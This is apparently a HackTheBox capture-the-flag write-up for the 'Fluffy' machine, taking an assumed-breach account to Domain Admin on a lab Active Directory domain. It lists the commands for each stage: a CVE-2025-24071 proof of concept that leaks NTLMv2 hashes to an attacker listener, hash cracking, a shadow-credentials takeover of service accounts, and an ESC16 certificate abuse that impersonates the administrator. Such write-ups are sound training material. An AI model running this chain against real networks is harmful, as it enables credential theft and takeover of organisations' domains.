HTB - Fluffy

Description


This machine follows an assumed breach scenario, starting with a user who has Read/Write access to an SMB share. Leveraging a recent Windows vulnerability, the attacker uploads a crafted .zip file containing a .library-ms file pointing to a malicious address. When any user extracts the archive, the system initiates an NTLMv2 authentication attempt to the attacker-controlled listener. Capturing the hash via smbserver or responder, the attacker cracks it to obtain credentials for another domain user. This user has GenericAll over a group, and the group has GenericWrite over three domain users, allowing takeover through a shadow credentials attack. One compromised user has WinRM access to the target system, and another is a member of the Cert Publishers group. By enumerating certificate templates, the attacker identifies and exploits an ESC16 misconfiguration to escalate privileges and obtain Domain Admin access.

Enumeration


As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Nmap Scan

I will start with normal Nmap scan, but first export the machine IP, Username, Password, and domain to variables for easy usage.

export target=10.10.11.69 ; export user=j.fleischman; export password='J0elTHEM4n1990!'; export domain=fluffy.htb

Nmap Scan

mkdir Nmap; nmap -p- --min-rate 10000 $target -Pn -oN Nmap/allports

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49693/tcp open  unknown
49709/tcp open  unknown
49716/tcp open  unknown

Then, put open ports into ports variable and run Nmap script and version scan

export ports="$(cat Nmap/allports | grep '^[0-9]' | cut -d/ -f1 | tr "\n" "," | sed 's/,$//g')"

nmap -p"$ports" $target -Pn -sC -sV -oN Nmap/script-scan

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-10 17:11:16Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-10T17:12:48+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing

Summary

* Open ports: 53,88,139,389,445,464,593,636,3268,3269,5985,9389
* Services: DNS, KERBEROS, LDAP, LDAPS, SMB, RPC, winRM
* Important notes: Domain: fluffy.htb - DNS:DC01.fluffy.htb

I always update /etc/hosts before I attack the domain to avoid any tooling issues.

echo "$target dc01 dc01.fluffy.htb fluffy.htb" | sudo tee -a /etc/hosts
10.10.11.69 dc01 dc01.fluffy.htb fluffy.htb

I started by enumerating SMB, looking for accessible shares, and I found that I had READ/WRITE permission on IT share

nxc smb $target -u $user -p $password --shares

I connected to the share and found a weird thing. There are archive files, and the corresponding archived data were extracted in the same place.

impacket-smbclient "$domain/$user:$password"@"$target"

There was also .pdf file which I downloaded and opened locally:

The PDF showed that several vulnerabilities affect the Windows system and need urgent updates to patch these vulnerabilities.

On the same PDF, there is a table with CVE ID and severity of the vulnerabilities

Foothold


CVE-2025-24071 is a recent windows vulnerability that allows stealing hashes using after unzipping archive files inside windows environment.

Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a.rararchive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.

I cloned the repo, ran the exploit, and uploaded the exploit file (.zip).

git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git

➜  CVE-2025-24071_PoC git:(main) python poc.py 

Enter your file name: exploit.zip
Enter IP (EX: 192.168.1.162): 10.10.16.14
completed

ls    
exploit.zip  poc.py  README.md

On another terminal, I opened smbserver to receive the NTLMV2 authentication

impacket-smbserver -smb2support shared $(pwd)

The hash was cracked successfully

hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt

..snip..
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:f29a0e18c93061c0af46ef5bb70b63e5:010100000000000000dd6793ebccdb013c7a2d2bd065bee600000000010010006c004f00620071004b00700056005100030010006c004f00620071004b00700056005100020010004a0061006300470061004b0050006800040010004a0061006300470061004b00500068000700080000dd6793ebccdb0106000400020000000800300030000000000000000100000000200000cbc3277eb791f42542be92295c13824afb1ef0001e7901d4f727bc0b8bbb43b60a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e003100360xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:REDACTED

Session..........: hashcat
Status...........: Cracked

With p.agila cred or j.fleischman, I could collect LDAP data with bloodhound.py

bloodhound-python -u $user -p $password -ns $target -d $domain -c all --dns-timeout 120 --zip

Lateral movement


  • BloodHound showed the escalation path from p.agila to 3 domain users:

    1. ca_svc is a member of Cert Publishers

    2. ldap_svc

    3. winrm_svc can winRM to the box

  • With GenericAll on Service Accounts, I can add any user to that group, inheriting its privileges

  • With GenericWrite, I could perform the following attacks:

    1. targetedkerberoast (Assign SPN to a user and obtain a hash to crack it offline)

    2. Shadow Credential (Add Key Credentials for a user)

I prefer to perform Shadow Credential attack because it follows OPSEC consideration

Add myself to Service Accounts group

loodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p REDACTED add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts

Add shadow cred for winrm_svc

certipy shadow auto -u p.agila@fluffy.htb -p REDACTED -account winrm_svc
evil-winrm -i fluffy.htb -u winrm_svc -H 33bd09dcd697600edfxxxxxxxxxxx

User flag: 2eb60ea1cc7b27axxxxxxxxxxxxxxx

Privilege Escalation


There was another account in Cert Publishers group and BloodHound described its privileges

First, I looked for ADCS in the domain with nxc and found one with the name offluffy-DC01-CA

nxc ldap fluffy.htb -u p.agila -p REDACTED' -M adcs                                     
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:######## 
ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA

Second, I added a key credential to ca_svc and got his hash

ertipy shadow auto -u p.agila@fluffy.htb -p REDCATED -account ca_svc

Then, I used the latest version of certipy to find vulnerable templates to ESC attacks

certipy find -u ca_svc@fluffy.htb -hashes REDACTED -enable -stdout -vulnerable

ESC16 describes a misconfiguration where the CA itself is globally configured to disable the inclusion of the szOID_NTDS_CA_SECURITY_EXT (OID 1.3.6.1.4.1.311.25.2) security extension in all certificates it issues. This SID extension, introduced with the May 2022 security updates (KB5014754), is vital for "strong certificate mapping", enabling DCs to reliably map a certificate to a user or computer account's SID for authentication.

I used Certipy Wiki to perform an ESC16 attack:

This is the case in my situation here:

  1. Change the victim account's UPN to match a target privileged account's sAMAccountName.

certipy account -u ca_svc -hashes RECATED -dc-ip 10.10.11.69 -upn 'administrator' -user 'ca_svc' update

Request kerberos ticket to authenticate with instead of NTLM authentication to have the updated UPN in the ticket information

impacket-getTGT fluffy.htb/ca_svc -hashes RECATED -dc-ip 10.10.11.69
export KRB5CCNAME=`pwd`/ca_svc.ccache
  1. Request a certificate (which will automatically lack the SID security extension due to the CA's ESC16 configuration).

certipy req -k -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca 'fluffy-DC01-CA' -template 'User'
  1. Revert the UPN change.

certipy account -u ca_svc -hashes RECATED -dc-ip 10.10.11.69 -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
  1. Use the certificate to impersonate the target.

certipy auth -dc-ip 10.10.11.69  -pfx 'administrator.pfx' -username 'administrator' -domain fluffy.htb                               
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Get the root flag

nxc smb fluffy.htb -u Administrator -H REDACTED -x 'type C:\Users\Administrator\Desktop\root.txt'

Last updated